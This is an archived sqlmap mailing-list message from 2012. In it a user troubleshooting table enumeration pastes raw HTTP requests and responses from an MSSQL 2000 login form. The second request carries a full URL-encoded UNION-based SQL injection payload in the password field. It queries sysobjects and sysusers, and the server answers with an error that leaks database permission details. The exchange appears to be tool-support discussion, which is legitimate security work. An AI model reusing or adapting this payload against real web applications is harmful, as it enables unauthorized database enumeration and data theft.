Re: [sqlmap-users] Injection on Post Parameter MSSQL 2000 Enumerating Tables issue
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Injection on Post Parameter MSSQL 2000 Enumerating Tables issue
|
From: John B. <sql...@ho...> - 2012-02-21 21:23:40
|
DBUSERNAME = database user nameDATABASENAME = name of the current database let me know if this is not helpful or if you need the snippet of html (which is just the hopepage) HTTP request [#1]:POST /index.asp?action=auth HTTP/1.1Accept-Encoding: identityAccept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7Host: site.comAccept-language: en-us,en;q=0.5Pragma: no-cacheCache-control: no-cache,no-storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24Connection: close UN=admin&PW=admin&x=0&y=0 HTTP response [#1] (200 OK):Content-length: 7091X-powered-by: ASP.NETSet-cookie: sitecom=0; path=/, ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP; path=/Age: 6Uri: http://site.com:80/index.asp?action=authServer: Microsoft-IIS/6.0Connection: closeCache-control: privateDate: Tue, 21 Feb 2012 21:15:23 GMTContent-type: text/html ** HTML OF HOMEPAGE - if relevant will add ** ############################################################################ HTTP request [#2]:POST /index.asp?action=auth HTTP/1.1Accept-Encoding: identityAccept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7Host: site.comAccept-language: en-us,en;q=0.5Pragma: no-cacheCache-control: no-cache,no-storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24Cookie: ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP;sitecom=0Connection: close UN=admin&PW=-8805%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%2858%29%2BISNULL%28CAST%28COUNT%28%2A%29%2 0AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%2858%29%2BCHAR%28114%29%2BCHAR%28120%29%2BCHAR%28100%29%2BCHAR%2858%29%20FROM%20DATABASENAME..sysobjects%20IN NER%20JOIN%20DATABASENAME..sysusers%20ON%20DATABASENAME..sysobjects.uid%20%3D%20DATABASENAME..sysusers.uid%20WHERE%20DATABASENAME..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%2 8118%29%29--%20%20AND%20%27qqvj%27%3D%27qqvj&x=0&y=0 HTTP response [#2] (500 Internal Server Error):Content-length: 480X-powered-by: ASP.NETSet-cookie: sitecom=0; path=/Age: 2Uri: http://www.site.com:80/index.asp?action=authServer: Microsoft-IIS/6.0Connection: closeCache-control: private, no-storeDate: Tue, 21 Feb 2012 21:15:28 GMTContent-type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80004005'</font><p><font face="Arial" size=2>Server user 'DBUSERNAME' is not a valid user in database 'DATABASENAME'.</font><p><font face="Arial" size=2>/index.asp</font><font face="Arial" size=2>, line 16</font> ############################################################################ |
